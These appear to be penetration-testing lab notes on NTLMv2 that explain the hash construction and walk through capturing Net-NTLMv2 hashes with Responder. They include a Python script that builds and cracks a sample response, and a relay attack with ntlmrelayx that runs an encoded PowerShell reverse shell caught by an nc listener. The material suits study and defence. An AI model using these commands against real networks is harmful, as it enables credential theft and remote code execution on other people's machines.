NT LAN Manager v2 (NTLMv2) is, you guessed it, the updated (and far more widely used) version of NTLM. Be precise about what is stored where: the SAM holds the NT hash (MD4 of the UTF-16LE password), not a Net-NTLMv2 hash. Net-NTLMv2 is the challenge-response that goes over the wire, and nothing of it is stored on disk.
The server still sends an 8-byte random challenge, exactly as in NTLM. What NTLMv2 changes is the client side: the client builds a blob containing a timestamp, its own 8-byte client challenge and the target info, and returns HMAC-MD5(NTLMv2 key, server challenge + blob), where the NTLMv2 key is HMAC-MD5(NT hash, UPPER(username) + domain). So the timestamp is part of the response, not the challenge. Because the response is keyed with a password-derived value, a captured Net-NTLMv2 hash can be cracked offline but cannot be passed the way an NT hash can; it can only be relayed.
Cracking Net-NTLMv2
Responder
Responder includes a built-in SMB server that handles the authentication process for us and prints all captured Net-NTLMv2 hashes.
Start Responder
kali@kali:~$ ip a
...
3: tap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 42:11:48:1b:55:18 brd ff:ff:ff:ff:ff:ff
inet 192.168.119.2/24 scope global tap0
valid_lft forever preferred_lft forever
inet6 fe80::4011:48ff:fe1b:5518/64 scope link
valid_lft forever preferred_lft forever
kali@kali:~$ sudo responder -I tap0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
...
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
...
[+] Listening for events...
Request Access to Non-Existent Share
We want to request a share that doesn't exist (or that we don't have access to) so that the Windows machine tries to authenticate to our SMB server. The authentication fails, but Responder still gets the Net-NTLMv2 hash and prints it as user::DOMAIN:challenge:NTProofStr:blob, the format hashcat (-m 5600) and john (netntlmv2) crack offline. Note: the IP we're querying is the IP of our Kali machine!
C:\Windows\system32>dir \\192.168.119.2\test
dir \\192.168.119.2\test
Access is denied.
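To make the hash construction concrete, here is an added Python example (it is not part of the original notes and is not Responder's or hashcat's code) that builds a Net-NTLMv2 response the way a Windows client does, prints it in the user::DOMAIN:challenge:NTProofStr:blob line layout Responder logs, and then cracks it by recomputing NTProofStr for each wordlist candidate. The user, domain, password, challenges and wordlist are constructed sample values, not a real capture; MD4 is implemented inline because hashlib's md4 is disabled on many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, written out here because hashlib.new('md4') is
    often unavailable; the NT hash is MD4 over the UTF-16LE password."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), list(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                aa = _rotl((aa + fn(bb, cc, dd) + x[idx] + k) & MASK32, shifts[i % 4])
                aa, bb, cc, dd = dd, aa, bb, cc
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The NT hash: this is what the SAM actually stores."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    msg = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash(password), msg, hashlib.md5).digest()


def av_pairs(nb_domain: str) -> bytes:
    """Minimal target info: MsvAvNbDomainName followed by MsvAvEOL."""
    name = nb_domain.encode("utf-16le")
    return struct.pack("<HH", 0x0002, len(name)) + name + struct.pack("<HH", 0, 0)


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: the timestamp lives here, next to the client's
    own 8-byte challenge. The server challenge is a separate random value."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def nt_proof_str(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """The 16-byte NTProofStr, the 4th field of a Responder line."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def responder_line(user, domain, password, server_challenge, blob) -> str:
    """Same layout as a Responder / hashcat -m 5600 line."""
    proof = nt_proof_str(ntlmv2_key(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist):
    """Offline attack: recompute NTProofStr per candidate and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(ntlmv2_key(candidate, user, domain), chal, blob), proof):
            return candidate
    return None


# Constructed sample values for the demo (not a real capture).
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD = "alice", "CORP", "Summer2023!"
SAMPLE_SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = build_blob(0x01D9A2B3C4D5E6F7, bytes.fromhex("aabbccddeeff0011"), av_pairs("CORP"))
SAMPLE_LINE = responder_line(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD,
                             SAMPLE_SERVER_CHALLENGE, SAMPLE_BLOB)
WORDLIST = ["password", "Winter2022!", "Summer2023!", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

The crack loop is exactly what hashcat -m 5600 does at scale: every candidate costs one MD4 and two HMAC-MD5s, and the server challenge plus blob in the captured line are all the salt there is, which is why a long passphrase is the only real defence against offline cracking of a captured Net-NTLMv2 hash.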
Sometimes we obtain a Net-NTLMv2 hash but can't crack it. A Net-NTLMv2 hash cannot be passed the way an NT hash can, but it can be relayed: if the account that authenticated to us is a local administrator on another host, we forward that authentication to the host over SMB and get code execution, much like we do with psexec or wmiexec.
IMPORTANT: SMB signing must be disabled (or at least not required) on the target for a relay attack to work! Check before relaying, for example with crackmapexec/NetExec: nxc smb 192.168.50.0/24 --gen-relay-list relay_targets.txt writes the hosts that don't require signing to a file. Domain controllers require signing by default, and you cannot relay an authentication back to the host it came from.
ntlmrelayx - Impacket
We can use ntlmrelayx from Impacket to relay the captured authentication over SMB to the target. Responder must not be holding port 445 at the same time: stop Responder, or set SMB = Off (and HTTP = Off) in Responder.conf, so that the SMB server started by ntlmrelayx is the one that receives the victim's connection.
kali@kali:~$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
--no-http-server disables ntlmrelayx's HTTP listener, since we are catching the authentication over SMB.
-smb2support lets the built-in SMB server speak SMB2 with modern Windows clients.
-t 192.168.50.212 is the target (the box we're trying to get access to).
-c "powershell -enc JABjAGwAaQBl..." is the command to execute on the target once the relayed authentication succeeds (here a base64-encoded PowerShell reverse shell).
Start Listener
We start a listener on our attack host to catch the incoming reverse shell. The port must match the one encoded in the PowerShell command.
kali@kali:~$ nc -nvlp 8080
Request Access to Non-Existent Share
Like with Responder, we trigger authentication from the victim by asking our attack host for a share that doesn't exist; this time ntlmrelayx catches the authentication and relays it to the target instead of just logging the hash.
C:\Windows\system32>dir \\192.168.119.2\test
Access is denied.
Check back on the nc listener and you should have a shell (assuming your PowerShell command works).
NOTE: Here are some resources for building a powershell command to be executed once the Net-NTLMv2 hash is relayed. (By Impacket)
AGAIN: FOR RELAYING TO GIVE US CODE EXECUTION, THE RELAYED ACCOUNT MUST BE A LOCAL ADMIN ON THE TARGET! Otherwise the relayed SMB authentication succeeds but the command execution fails.